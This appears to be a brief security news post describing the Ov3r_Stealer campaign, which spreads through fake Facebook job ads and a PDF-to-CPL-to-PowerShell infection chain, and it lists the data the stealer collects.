Threat actors are using fake #Facebook job ads to fool victims into installing Ov3r_Stealer, a new Windows-based stealer virus.
Ov3r_Stealer is designed to extract IP address-based location, hardware details, passwords, cookies, credit card info, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products from the infected host.
The campaign’s motive remains unclear; however, stolen data is often sold to other threat actors. Ov3r_Stealer may also be modified to deploy malware and other payloads, such as QakBot.
The attack initiates with a malicious PDF file seemingly hosted on OneDrive, enticing users to click on an “Access Document” button.
Trustwave discovered the PDF file posted on a fake Amazon CEO Andy Jassy Facebook account and Facebook advertisements promoting digital advertising opportunities.
Upon clicking the button, users are directed to a .URL file pretending to be a DocuSign document hosted on Discord’s CDN. A control panel item (.CPL) file is delivered through the shortcut file and executed by the Windows Control Panel process binary (“control.exe”).
Executing the CPL file triggers a PowerShell loader (“DATA1.txt”) retrieval from GitHub to execute Ov3r_Stealer.